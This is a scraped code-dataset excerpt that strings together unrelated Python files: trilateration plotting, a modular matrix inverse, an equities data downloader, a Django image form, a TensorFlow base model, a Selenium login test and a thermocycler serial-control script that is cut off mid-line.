np.array(([anc2DPos[refTri3[0]][0],anc2DPos[refTri3[0]][0]],[anc2DPos[refTri3[0]][1],anc2DPos[refTri3[0]][1]])) \n \n # Now we must use the reflection resolver to make sure we have the correct solution\n distTol = 1\n \n # Check using LCS 1\n trueDist = tagMat[j][refTri1[2]] \n dist1 = np.linalg.norm(anc2DPos[refTri1[2],:] - xy1[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri1[2],:] - xy1[:, 1])\n if trueDist - dist1 < distTol:\n soln1 = xy1[:, 0] \n elif trueDist - dist2 < distTol:\n soln1 = xy1[:, 1] \n else:\n soln1 = np.nan\n\n # Check using LCS 2 \n trueDist = tagMat[j][refTri2[2]]\n dist1 = np.linalg.norm(anc2DPos[refTri2[2],:] - xy2[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri2[2],:] - xy2[:, 1])\n if trueDist - dist1 < distTol:\n soln2 = xy2[:, 0] \n elif trueDist - dist2 < distTol:\n soln2 = xy2[:, 1] \n else:\n soln2 = np.nan \n\n \n # Check using LCS 3 \n trueDist = tagMat[j][refTri3[2]]\n dist1 = np.linalg.norm(anc2DPos[refTri3[2],:] - xy3[:, 0])\n dist2 = np.linalg.norm(anc2DPos[refTri3[2],:] - xy3[:, 1])\n if trueDist - dist1 < distTol:\n soln3 = xy3[:, 0] \n elif trueDist - dist2 < distTol:\n soln3 = xy3[:, 1] \n else:\n soln3 = np.nan \n \n ###########################################################\n # BIG ASSUMPTION HERE: NEED TO ADD ROBUSTNESS\n ###########################################################\n # For now let's enter soln1 into the tempTagPos matrix\n tempTagPos[j, :] = soln1\n\n\n\n plt.subplot(1, 2, 1)\n plt.scatter(actualPositions[:, 0], actualPositions[:, 1], color='red')\n plt.scatter(tagPos[0, 0], tagPos[0, 1], color='black', marker = 'o')\n plt.scatter(tagPos[1, 0], tagPos[1, 1], color='black', marker = 'x')\n plt.scatter(tagPos[2, 0], tagPos[2, 1], color='black', marker = '1')\n plt.title('Actual Position')\n plt.axis('equal')\n plt.grid()\n\n plt.subplot(1, 2, 2)\n plt.scatter(anc2DPos[:, 0], anc2DPos[:, 1], color='blue')\n plt.scatter(tempTagPos[0, 0], tempTagPos[0, 1], color='black', marker = 'o')\n plt.scatter(tempTagPos[1, 0], tempTagPos[1, 1], color='black', marker = 'x')\n plt.scatter(tempTagPos[2, 0], tempTagPos[2, 1], color='black', marker = '1')\n plt.title('Calculated Position')\n plt.axis('equal')\n plt.grid()\n\n plt.show()\n sys.exit()\n\n\n\n # Now reorient the coordinate system to reflect the tag positions\n translateVec = copy.deepcopy(tempTagPos[0, :])\n \n # Translate\n for j 
in range(0,ancNum):\n anc2DPos[j, :] = anc2DPos[j, :] - translateVec\n for j in range(0,3): \n tempTagPos[j, :] = tempTagPos[j, :] - translateVec\n \n\n\n # Rotate\n theta = np.arctan2(tempTagPos[1,1],tempTagPos[1,0])\n rotateMat = np.transpose(np.array([[np.cos(theta), -np.sin(theta)],[np.sin(theta), np.cos(theta)]]))\n\n anc2DPos = np.transpose(np.dot(rotateMat, np.transpose(anc2DPos)))\n tempTagPos = np.transpose(np.dot(rotateMat, np.transpose(tempTagPos)))\n \n # Flip the coordinate system\n # The tags were ordered around the field in a right-hand configuration\n # So the z component of the cross product is positive\n # Now we check if this is the case and flip if appropriate\n V1 = np.append(tempTagPos[1, :] - tempTagPos[0, :], [0.00])\n V2 = np.append(tempTagPos[2, :] - tempTagPos[1, :], [0.00])\n V3 = np.cross(V1,V2)\n\n # if V3[2] is negative then we must flip across the x-axis\n if V3[2]<0.00:\n anc2DPos[:,1] = -anc2DPos[:,1]\n tempTagPos[:,1] = -tempTagPos[:,1]\n\n return anc2DPos\n","sub_path":"Projects/autoSetup/coordinateFunc/coordinateFunc.py","file_name":"coordinateFunc.py","file_ext":"py","file_size_in_byte":12072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"549992032","text":"import numpy as np\n\n# key should be a numpy array\ndef mod_inv(key):\n '''\n Modular inverse. Only for mod 31.\n\n Arguments:\n key: a 2-D numpy array\n\n Return:\n modinv: modular inverse of key\n '''\n det = int(round(np.linalg.det(key))) # determinant of key\n adj = np.linalg.inv(key) * det # adjugate matrix of key\n assert det % 31 != 0\n moddet = np.mod(det ** 29, 31) # Fermat's Little Theorem\n modinv = np.around(np.mod(adj * moddet, 31)).astype(int)\n return modinv\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195180833","text":"import os\n\nimport StringIO\nimport numpy as np\nimport pandas as pd\nimport requests\nimport urllib3\nimport zipfile\nfrom pandas import DataFrame as df\n\nimport config.TradingPlatformConfig as TradingPlatformConfig\nfrom utils.Constants import EQUITIES_COLUMNS\nfrom utils.TradingPlatformUtils import parseDate, equities_composite_hash\n\nconfiguration = TradingPlatformConfig.Configuration()\n\nBACKUP_DATA_SOURCE = configuration.base_directory + \"/backup_data_source\"\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nhdr = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n\n\ndef get_equities_daily_file_dump_url(trade_date):\n year = trade_date.strftime(\"%Y\")\n month = (trade_date.strftime(\"%b\")).upper()\n day = trade_date.strftime(\"%d\")\n return \"https://nseindia.com/content/historical/EQUITIES/\" + year + \"/\" + month + \"/\" + \"cm\" + day + month + year + \"bhav.csv.zip\"\n\n\ndef get_equities_daily_file_dump_name(trade_date):\n year = trade_date.strftime(\"%Y\")\n month = (trade_date.strftime(\"%b\")).upper()\n day = trade_date.strftime(\"%d\")\n return \"cm\" + day + month + year + \"bhav.csv\"\n\n\ndef download_daily_file_dump(url):\n r = requests.get(url, stream=True)\n z = zipfile.ZipFile(StringIO.StringIO(r.content))\n 
z.extractall(BACKUP_DATA_SOURCE)\n\n\ndef transform_equities_quote(equities_quote, trade_date):\n processed_quote = pd.Series(index=EQUITIES_COLUMNS)\n open = equities_quote[\"OPEN\"]\n lastPrice = equities_quote[\"LAST\"]\n previous_close = equities_quote[\"PREVCLOSE\"]\n high = equities_quote[\"HIGH\"]\n low = equities_quote[\"LOW\"]\n close = equities_quote[\"CLOSE\"]\n volume = equities_quote[\"TOTTRDQTY\"]\n deliveredToTraded = np.NaN\n stock = str(equities_quote[\"SYMBOL\"].values[0])\n diff = (lastPrice - open) / previous_close\n range = (high - low) / open\n processed_quote[\"Diff\"] = diff\n processed_quote[\"PreviousClose\"] = previous_close\n processed_quote[\"OpenPrice\"] = open\n processed_quote[\"HighPrice\"] = high\n processed_quote[\"LowPrice\"] = low\n processed_quote[\"LastPrice\"] = lastPrice\n processed_quote[\"ClosePrice\"] = close\n processed_quote[\"Volume\"] = volume\n processed_quote[\"DeliveredToTraded\"] = deliveredToTraded\n processed_quote[\"ScriptName\"] = stock\n processed_quote[\"TradeDate\"] = trade_date\n processed_quote[\"EquitiesHash\"] = equities_composite_hash(trade_date, stock)\n return processed_quote\n\n\nclass BackupEquitiesDataLoad:\n trade_date = \"\"\n equities_data = df()\n\n def __init__(self, trade_date):\n self.trade_date = parseDate(trade_date)\n daily_dump_url = get_equities_daily_file_dump_url(self.trade_date)\n download_daily_file_dump(daily_dump_url)\n file_name = BACKUP_DATA_SOURCE + \"/\" + get_equities_daily_file_dump_name(self.trade_date)\n self.equities_data = pd.read_csv(file_name)\n\n def get_equities_quote(self, script_name):\n equities_quote = self.equities_data[self.equities_data[\"SYMBOL\"].isin([(script_name)])]\n equities_quote = equities_quote[equities_quote[\"SERIES\"].isin([(\"EQ\")])]\n return transform_equities_quote(equities_quote, str(self.trade_date))\n\n def delete_downloaded_file(self):\n file_name = BACKUP_DATA_SOURCE + \"/\" + get_equities_daily_file_dump_name(self.trade_date)\n if os.path.isfile(file_name):\n os.remove(file_name)\n","sub_path":"data_load/BackupEquitiesDataLoad.py","file_name":"BackupEquitiesDataLoad.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"1331024","text":"def gcdIter(a, b):\n higher = a\n lower = b\n if b > a:\n higher = b\n lower = a\n astart = higher\n score = 1\n\n while score > 0:\n mod = b % astart\n mod2 = a % astart\n score = mod + mod2\n astart -= 1\n return astart + 1\n","sub_path":"_edX MiT/week 2 (Simple Programs)/4. Functions/gcd-iter.py","file_name":"gcd-iter.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"567300039","text":"# Get velocity field from the JHUTDB\n\n# The velocity fields are filtered and then the exact SGS stresses, the\n# filtered viscous stresses, and the Smagorinsky SGS stresses are calculated.\n\n# The filtered velocity fields saved are wider than the stresses because the\n# boundaries are needed in the nonlocal integration. 
The stresses have the same\n# horizontal dimensions as those that will be calculated nonlocally.\n\n# import modules\nimport numpy as np\nimport pyJHTDB\nimport scipy.signal\nimport models\nimport sys\n\n# Initialize and add token\nauth_token = \"edu.jhu.pato-ca56ca00\" \nlJHTDB = pyJHTDB.libJHTDB()\nlJHTDB.initialize()\nlJHTDB.add_token(auth_token)\n\n# Dimensions\ndims = 3\nvisc_length = 1.0006e-3\ndt = 0.0065\ndx = 8*np.pi/2048\ndz = 3*np.pi/1536 \ncut_dims = [64,8,64]\nNx = 64\nNy = 8\nNz = 64\ny0 = 239\nz0 = 1\nx0 = 1024\nxe = x0 + Nx - 1\nye = y0 + Ny - 1 \nze = z0 + Nz - 1\n\n# Iterate through snapshots\nfor tidx in range(150):\n x0p = x0 - round(0.45*dt*tidx/dx)\n xep = xe - round(0.45*dt*tidx/dx)\n\n # Get velocity field (unfiltered)\n velocity = lJHTDB.getbigCutout(\n data_set = 'channel',\n fields='u',\n t_start=tidx+1,\n t_end=tidx+1,\n start = np.array([x0p, y0, z0], dtype = np.int),\n end = np.array([xep, ye, ze], dtype = np.int),\n step = np.array([1, 1, 1], dtype = np.int),\n filter_width = 1)\n\n # Make the shape of velocity equal to (dims,Nx,Ny,Nz)\n velocity = np.transpose(velocity)\n\n # Save\n np.save('data/velos.{:02}.npy'.format(tidx), velocity)\n\n # Get the pressure field (unfiltered)\n velocity = lJHTDB.getbigCutout(\n data_set = 'channel',\n fields='p',\n t_start=tidx+1,\n t_end=tidx+1,\n start = np.array([x0p, y0, z0], dtype = np.int),\n end = np.array([xep, ye, ze], dtype = np.int),\n step = np.array([1, 1, 1], dtype = np.int),\n filter_width = 1)\n\n # Make the shape of velocity equal to (dims,Nx,Ny,Nz)\n velocity = np.transpose(velocity)\n\n # Save\n np.save('data/press.{:02}.npy'.format(tidx), velocity)\n","sub_path":"tf1/dns/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"277985127","text":"from django import forms\r\nfrom django.core.files.base import ContentFile \r\nfrom slugify import slugify\r\nfrom urllib import request\r\nfrom .models import Image\r\n\r\n# header={\r\n# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n# \"referer\":\"https://image.baidu.com\"\r\n# }\r\n\r\n\r\nclass ImageForm(forms.ModelForm):\r\n class Meta: \r\n model = Image\r\n fields = ('title', 'url', 'description')\r\n\r\n def clean_url(self):\r\n url = self.cleaned_data['url']\r\n valid_extensions = ['jpg', 'jpeg', 'png']\r\n extension = url.rsplit('.', 1)[1].lower()\r\n if extension not in valid_extensions:\r\n raise forms.ValidationError(\"The given Url does not match valid image extension.\")\r\n return url\r\n \r\n def save(self, force_insert=False, force_update=False, commit=True):\r\n image = super(ImageForm, self).save(commit=False)\r\n\r\n image_url = self.cleaned_data['url']\r\n # rep=request.Request(image_url,headers=header)\r\n\r\n image_name = '{0}.{1}'.format(slugify(image.title), image_url.rsplit('.', 1)[1].lower()) \r\n response = request.urlopen(image_url)\r\n image.image.save(image_name, ContentFile(response.read()), save=False)\r\n if commit:\r\n image.save() \r\n \r\n return image","sub_path":"mybbs/image/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493956919","text":"from flask import Flask, request\nimport os\nfrom flask_cors import CORS\n\n\n\napp = Flask(__name__)\nCORS(app, 
resources=r'/*')\n\n\n@app.route('/')\ndef hello_world():\n return 'hello world'\n\n\n@app.route('/item', methods=['GET'])\ndef item():\n name = request.args.get(\"item\")\n\n print('name= -------> ', name)\n os.system(\"python run.py -i {}\".format(name))\n return 'welcome ' + name\n\n\n@app.route('/gvalue', methods=['GET'])\ndef gvalue():\n val = request.args.get(\"value\")\n print('value= ------>', val)\n os.system(\"python run.py -v {}\".format(val))\n return 'get your val' + val\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8888, debug=False)\n","sub_path":"pythonfiles/flask-get-scripts/hello/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"481162247","text":"import tensorflow as tf\nimport numpy as np\nfrom .standard_layers import StandardLayers\ntf.logging.set_verbosity(tf.logging.ERROR)\ntf.set_random_seed(4)\nnp.random.seed(4)\n\n\nclass Base(StandardLayers):\n '''\n Base model featuring useful Tensorflow utilities.\n '''\n\n def __init__(self, sess, config, logger):\n '''\n Initiate base model.\n Args:\n - sess: tf.Session().\n - config: module with model config.\n - logger: custom logger handler.\n '''\n\n self.sess = sess\n self.config = config\n self.saver = None\n self.logger = logger\n self.model_name = \"default.model\"\n self.global_step = tf.Variable(0,\n dtype=tf.int32,\n trainable=False,\n name='global_step')\n\n def initialize(self):\n '''\n Initializes model.\n Builds model -> starts summary writer -> global vars init.\n '''\n\n self.logger.debug('Initializing model...')\n self.build_model()\n\n self.logger.debug('Model built. Initializing model writer...')\n self.train_writer = tf.summary.FileWriter(self.config.GRAPHS_TRAIN_DIR,\n self.sess.graph)\n self.test_writer = tf.summary.FileWriter(self.config.GRAPHS_TEST_DIR,\n self.sess.graph)\n\n self.logger.debug('Writer initialized. Initializing TF graph...')\n self.var_init = tf.global_variables_initializer()\n self.var_init.run()\n self.logger.debug('TF graph initialized.')\n\n self.logger.info('Model initialized.')\n\n def save(self, global_step=None):\n '''\n Save the current variables in graph.\n Optional option to save for global_step (used in Train).\n '''\n\n self.logger.debug('Saving model...')\n if self.saver is None:\n self.logger.debug('Saver not initiated, creating new model Saver.')\n self.saver = tf.train.Saver(tf.global_variables())\n\n if global_step is None:\n self.saver.save(self.sess,\n self.config.CHECKPOINTS_DIR + self.model_name)\n self.logger.debug('Saved with no global step.')\n else:\n self.saver.save(self.sess,\n self.config.CHECKPOINTS_DIR + self.model_name,\n global_step=self.global_step)\n self.logger.debug('Saved with global step.')\n\n self.logger.info('Model saved.')\n\n def restore(self, resume=True):\n '''\n Restore TF computation graph from saved checkpoint.\n Args:\n - resume (bool): resume last checkpoint or restore standard\n save file.\n '''\n\n self.logger.debug('Restoring model...')\n\n if self.saver is None:\n self.logger.debug('Saver not initiated, creating new model Saver.')\n self.saver = tf.train.Saver(tf.global_variables())\n\n if resume:\n self.logger.debug('Resume enabled. Finding newest model checkpoint.')\n\n ckpt = tf.train.latest_checkpoint(self.config.CHECKPOINTS_DIR)\n if ckpt:\n self.logger.debug('Model checkpoint found. Restoring...')\n self.saver.restore(self.sess, ckpt)\n self.logger.info('Model restored. 
Resuming from checkpoint.')\n return True\n else:\n self.logger.error('Resume enabled but no model checkpoints found. \\\n \\n Terminating...')\n raise ValueError()\n else:\n self.logger.debug('Resume disabled. Restoring from default save...')\n self.saver.restore(\n self.sess, self.config.CHECKPOINTS_DIR + self.model_name)\n self.logger.info('Model restored.')\n\n def train(self, X, Y, test_X, test_Y):\n '''\n Run model training. Model must have been initialized.\n Args:\n X (np.arr): featured data. Assuming len(X) > batch size.\n Y (np.arr): labels. Assuming len(Y) > batch size.\n '''\n\n self.logger.info('Starting model training...')\n\n for j in range(self.config.ITERATIONS):\n for i in range(0, len(X) + 1 - self.config.BATCH_SIZE,\n self.config.BATCH_SIZE):\n feed_dict = {\n self.x: X[i:i + self.config.BATCH_SIZE],\n self.target: Y[i:i + self.config.BATCH_SIZE]\n }\n _, train_acc, train_loss, train_summary = self.sess.run(\n [self.optim, self.acc, self.loss, self.summary_op],\n feed_dict=feed_dict)\n\n # Save every 10 iterations\n if j % 10 == 0:\n self.save(self.global_step)\n\n if j % 1 == 0:\n # Report training\n self.logger.info(\"Epoch: \" + str(j) + \" has train loss: \" +\n str(float(train_loss)) + \" and train accuracy: \" +\n str(float(train_acc)))\n self.train_writer.add_summary(train_summary, global_step=j)\n\n # Report test\n feed_dict = {\n self.x: test_X[:self.config.BATCH_SIZE],\n self.target: test_Y[:self.config.BATCH_SIZE]\n }\n test_acc, test_loss, test_summary = self.sess.run(\n [self.acc, self.loss, self.summary_op],\n feed_dict=feed_dict)\n self.logger.info(\"Epoch: \" + str(j) + \" has test loss: \" +\n str(float(test_loss)) + \" and test accuracy: \" +\n str(float(test_acc)))\n self.test_writer.add_summary(test_summary, global_step=j)\n\n self.logger.info('Model finished training!')\n\n def predict(self, X):\n '''\n Predict classifications for new inputs.\n Args:\n X (np.arr): featured data. Assuming len(X) > batch size.\n Note that left over data from batching are\n NOT calculated. 
So pad batches beforehand.\n Returns:\n predictions (list of np.arr): flat list of predictions.\n '''\n\n self.logger.info('Starting model predictions...')\n predictions = []\n for i in range(0, len(X) + 1 - self.config.BATCH_SIZE,\n self.config.BATCH_SIZE):\n feed_dict = {\n self.x: X[i:i + self.config.BATCH_SIZE]\n }\n predictions += list(self.sess.run([self.prediction],\n feed_dict=feed_dict)[0])\n self.logger.info('Model finished predicting!')\n return np.array(predictions)\n\n def shuffle_and_partition(self, X, Y, n_test, n_val):\n '''\n Shuffle and partition input data.\n Args:\n - X (np.array): X data\n - Y (np.array): target to be shuffled in sync\n - n_test (int): number of test points\n - n_val (int): number of validation points\n Return:\n - result:\n {\"train\": {\"X\": np.arr, \"Y\": np.arr},\n \"test\": {\"X\": np.arr, \"Y\": np.arr},\n \"val\": {\"X\": np.arr, \"Y\": np.arr}}.\n '''\n\n n_train = X.shape[0] - n_test - n_val\n self.logger.debug('Shuffling and partitioning data...')\n\n self.logger.debug('Shuffling X, Y in sync...')\n p = np.random.permutation(X.shape[0])\n shuffled_X, shuffled_Y = X[p], Y[p]\n del(p)\n del(X)\n del(Y)\n self.logger.debug('Finished shuffling dataset.')\n\n # Structured as: [train, test, val]\n self.logger.debug('Partitioning with training size: ' + str(n_train) +\n ' test size: ' + str(n_test) + ' and val size: ' +\n str(n_val) + '...')\n self.logger.debug('First partitioning X...')\n train_X = shuffled_X[:n_train]\n test_X = shuffled_X[n_train:(n_train + n_test)]\n val_X = shuffled_X[(n_train + n_test):]\n del(shuffled_X)\n\n self.logger.debug('Finished partitioning X. Now partitioning Y...')\n train_Y = shuffled_Y[:n_train]\n test_Y = shuffled_Y[n_train:(n_train + n_test)]\n val_Y = shuffled_Y[(n_train + n_test):]\n del(shuffled_Y)\n self.logger.debug('Finished partitioning Y.')\n\n self.logger.info('Finished shuffling and partitioning.')\n\n uniques, counts = np.unique(np.argmax(train_Y, 1), return_counts=True)\n for i in range(len(uniques)):\n self.logger.debug(\n 'Class: ' + str(uniques[i]) + '; count: ' + str(counts[i]))\n\n return {\"train\": {\"X\": train_X, \"Y\": train_Y},\n \"test\": {\"X\": test_X, \"Y\": test_Y},\n \"val\": {\"X\": val_X, \"Y\": val_Y}}\n\n","sub_path":"Alpaca/src/model_base/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":8022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417349243","text":"import unittest\nfrom project.toolUtils.yamlUtils import Yaml\nfrom project.page.loginPage import LoginPage\nfrom project.toolUtils.getData import GetData\nfrom parameterized import parameterized\nimport warnings\nfrom selenium import webdriver\nfrom time import sleep\nfrom project.toolUtils.logUtils import log\nimport time\n\nlogfile = Yaml(\"./config/configFile.yaml\").readYaml()[\"logFiles\"][\"loginLog\"].format(time.strftime(\"%Y-%m-%d\"))\nlogger = log(logfile)\n\nconfigFile = Yaml(\"./config/configFile.yaml\").readYaml()\ntcPath = configFile[\"caseFiles\"][\"loginTC\"]\ngetObj = GetData(tcPath)\n\nbaseUrl = configFile[\"baseUrl\"]\nelementDict = Yaml(\"./config/elementLoc/loginEle.yaml\").readYaml()\n\nclass TestLogin(unittest.TestCase):\n\n global baseUrl\n global elementDict\n\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(30)\n self.baseUrl = baseUrl\n warnings.simplefilter(\"ignore\", ResourceWarning)\n\n @parameterized.expand(getObj.data())\n def testLogin(self,id, desc, dataDict, 
expected):\n driver = self.driver\n case = LoginPage(driver, self.baseUrl, elementDict, id, desc, dataDict)\n logger.msg(\"case: %s START!\" %desc, \"info\")\n if id == \"1\":\n case.pwLoginSucess()\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n elif id == \"2\":\n case.loginPhInc()\n # assert if error pops\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n assert (case.getText(expected[\"type\"], expected[\"value\"]) == expected[\"text\"])\n elif id == \"3\":\n case.loginSmsInc()\n # assert if error pops\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n assert (case.getText(expected[\"type\"], expected[\"value\"]) == expected[\"text\"])\n elif id == \"4\":\n case.loginPwInc()\n # assert if error pops\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n assert (case.getText(expected[\"type\"], expected[\"value\"]) == expected[\"text\"])\n else:\n case.logout()\n # assert if logout success\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n logger.msg(\"case: %s FINISHED!\" % desc, \"info\")\n sleep(3)\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__ == '__main__':\n\n # testData = {\n # \"uri\":\"/\",\n # \"iframeLoc\":(By.XPATH, \"//div[@class='login']/iframe\"),\n # \"wayOfLoc\":(By.CLASS_NAME, \"account-tab-account\"),\n # \"usernameLoc\":(By.ID, \"username\"),\n # \"passwordLoc\":(By.ID, \"password\"),\n # \"username\": \"15122888806\",\n # \"password\": \"huanhuan350881\",\n # \"submitLoc\":(By.LINK_TEXT, \"登录豆瓣\")\n # }\n # inData = {\"username\": \"15122888806\",\"password\": \"huanhuan350881\"}\n # filepath = \"../config/loginEle.yaml\"\n\n unittest.main()\n","sub_path":"project/case/testLogin.py","file_name":"testLogin.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281743351","text":"import serial\nimport csv\nimport time\nimport threading\nfrom argparse import ArgumentParser\n\n#---------------------------------------#\nTOTAL_RUNS = 250\nGCODES = True\nTC_GCODE_ROUNDING_PRECISION = 2\n\nCOVER_TEMP = 105\nPLATE_TEMP_PRE = 10\nPLATE_TEMP_HOLD_1 = (94, 180)\n# Following temp durations have been increased by 10 sec to accommodate for ramp time\nPLATE_TEMP_REPEAT = [(94, 20), (70, 40), (72, 40)]\nPLATE_TEMP_HOLD_2 = (72, 300)\nPLATE_TEMP_POST = 4\nCYCLES = 29\n#---------------------------------------#\n\nBAUDRATE = 115200\nGCODES = {\n 'OPEN_LID': 'M126',\n 'CLOSE_LID': 'M127',\n 'GET_LID_STATUS': 'M119',\n 'SET_LID_TEMP': 'M140',\n 'GET_LID_TEMP': 'M141',\n 'DEACTIVATE_LID_HEATING': 'M108',\n 'EDIT_PID_PARAMS': 'M301',\n 'SET_PLATE_TEMP': 'M104',\n 'GET_PLATE_TEMP': 'M105',\n 'SET_RAMP_RATE': 'M566',\n 'DEACTIVATE': 'M18',\n 'DEVICE_INFO': 'M115'\n}\n\nSERIAL_ACK = '\\r\\n'\n\nPROTOCOL_STEPS = [\n\t'{} S{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_PRE, SERIAL_ACK),\t# 0\n\t'{} S{}{}'.format(GCODES['SET_LID_TEMP'], COVER_TEMP, SERIAL_ACK),\t\t# 1\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_HOLD_1[0], PLATE_TEMP_HOLD_1[1], SERIAL_ACK),\t\t# 2\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_REPEAT[0][0], PLATE_TEMP_REPEAT[0][1], SERIAL_ACK),# 3\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_REPEAT[1][0], PLATE_TEMP_REPEAT[1][1], SERIAL_ACK),# 4\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_REPEAT[2][0], PLATE_TEMP_REPEAT[2][1], SERIAL_ACK),# 5\n\t'{} S{} 
H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_HOLD_2[0], PLATE_TEMP_HOLD_2[1], SERIAL_ACK),\t\t# 6\n\t'{}{}'.format(GCODES['DEACTIVATE_LID_HEATING'], SERIAL_ACK),\t\t\t\t# 7\n\t'{} S{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_POST, SERIAL_ACK)\t# 8\n\t]\nGCODE_DEBUG_PRINT_MODE = 'M111 cont{}'.format(SERIAL_ACK)\nGET_STAT = 'stat{}'.format(SERIAL_ACK)\nDEACTIVATE = '{}{}'.format(GCODES['DEACTIVATE'], SERIAL_ACK)\n\ndef build_arg_parser():\n\targ_parser = ArgumentParser(\n\t\tdescription=\"Thermocycler temperature data logger\")\n\targ_parser.add_argument(\"-P\", \"--module_port\", required=True)\n\targ_parser.add_argument(\"-F\", \"--csv_file_name\", required=True)\n\treturn arg_parser\n\ndef _send(ser, lock, cmd):\n\twith lock:\n\t\tprint(\"Sending: {}\".format(cmd))\n\t\tser.write(cmd.encode())\n\ndef parse_number_from_substring(substring, rounding_val):\n\t'''\n\tReturns the number in the expected string \"N:12.3\", where \"N\" is the\n\tkey, and \"12.3\" is a floating point value\n\n\tFor the temp-deck or thermocycler's temperature response, one expected\n\tinput is something like \"T:none\", where \"none\" should return a None value\n\t'''\n\ttry:\n\t\tvalue = substring.split(':')[1]\n\t\tif value.strip().lower() == 'none':\n\t\t\treturn None\n\t\treturn round(float(value), rounding_val)\n\texcept (ValueError, IndexError, TypeError, AttributeError):\n\t\tprint('Unexpected argument to parse_number_from_substring:')\n\t\traise Exception(\n\t\t\t'Unexpected argument to parse_number_from_substring: {}'.format(substring))\n\n\ndef parse_key_from_substring(substring) -> str:\n\t'''\n\tReturns the axis in the expected string \"N:12.3\", where \"N\" is the\n\tkey, and \"12.3\" is a floating point value\n\t'''\n\ttry:\n\t\treturn substring.split(':')[0]\n\texcept (ValueError, IndexError, TypeError, AttributeError):\n\t\tprint('Unexpected argument to parse_key_from_substring:')\n\t\traise Exception(\n\t\t\t'Unexpected argument to parse_key_from_substring: {}'.format(substring))\n\n\ndef run_protocol(ser, lock):\n\tfor run_x in range(TOTAL_RUNS):\n\t\tprint(\"****** Run #{} *******\".format(run_x))\n\t\t_send(ser, lock, PROTOCOL_STEPS[0])\t# Plate PRE\n\t\t_send(ser, lock, PROTOCOL_STEPS[1])\t# Lid temp\n\t\ttime.sleep(150)\t # Takes approx 5 minutes for lid to heat\n\t\t_send(ser, lock, PROTOCOL_STEPS[2])\t# First point\n\t\ttime.sleep(PLATE_TEMP_HOLD_1[1])\n\t\tfor i in range(CYCLES):\n\t\t\t_send(ser, lock, PROTOCOL_STEPS[3])\t# First repeat\n\t\t\ttime.sleep(PLATE_TEMP_REPEAT[0][1])\n\t\t\t_send(ser, lock, PROTOCOL_STEPS[4])\t# Second repeat\n\t\t\ttime.sleep(PLATE_TEMP_REPEAT[1][1])\n\t\t\t_send(ser, lock, PROTOCOL_STEPS[5])\t# Last repeat\n\t\t\ttime.sleep(PLATE_TEMP_REPEAT[2][1])\n\t\t_send(ser, lock, PROTOCOL_STEPS[6])\t# Rest step\n\t\ttime.sleep(PLATE_TEMP_HOLD_2[1])\n\t\t_send(ser, lock, PROTOCOL_STEPS[7])\t# Lid stop\n\t\t_send(ser, lock, PROTOCOL_STEPS[8])\t# incubate\n\t\ttime.sleep(200)\n\t\tprint(\"******* Run #{} Completed *******\".format(run_x))\n\t_send(ser, lock, DEACTIVATE)\n\n\ndef record_status(filename, ser, lock):\n\t_send(ser, lock, GCODE_DEBUG_PRINT_MODE)\n\ttime.sleep(0.5)\n\tser.readline()\n\tser.readline()\n\twhile True:\n\t\twith lock:\n\t\t\tserial_line = ser.readline()\n\t\tif serial_line:\n\t\t\tserial_list = serial_line.decode().split(\"\\t\")\n\t\t\tserial_list = list(map(lambda x: x.strip(), serial_list))\n\t\t\tdata_res = {}\n\t\t\tfor substr in serial_list:\n\t\t\t\tif substr == '':\n\t\t\t\t\tcontinue\n\t\t\t\tprint(substr,end 
